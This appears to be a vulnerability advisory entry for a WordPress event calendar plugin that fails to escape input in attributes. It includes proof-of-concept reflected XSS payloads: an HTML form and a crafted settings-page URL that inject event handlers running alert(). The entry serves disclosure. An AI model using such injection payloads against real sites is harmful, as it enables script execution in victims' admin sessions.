The plugin does not escape some user input before outputting it back in attributes, leading to Reflected Cross-SIte Scripting issues
<html> <form action="https://example.com/wp-admin/admin-ajax.php?action=ecwd_event_popup_ajax" method="POST"> <input type="text" value='" onmouseover=alert(/XSS/) p' name="id"> <input type="submit" value="Send"> </form> </html> And move the mouse over the 'Untitled' text (Firefox only): https://example.com/wp-admin/edit.php?post_type=ecwd_event&page=ecwd_general_settings&tab=%22+accesskey%3Dx+onclick%3Dalert%281%29+p
Krzysztof Zając
Krzysztof Zając
Yes
2021-12-20 (about 1 years ago)
2021-12-20 (about 1 years ago)
2022-04-16 (about 1 years ago)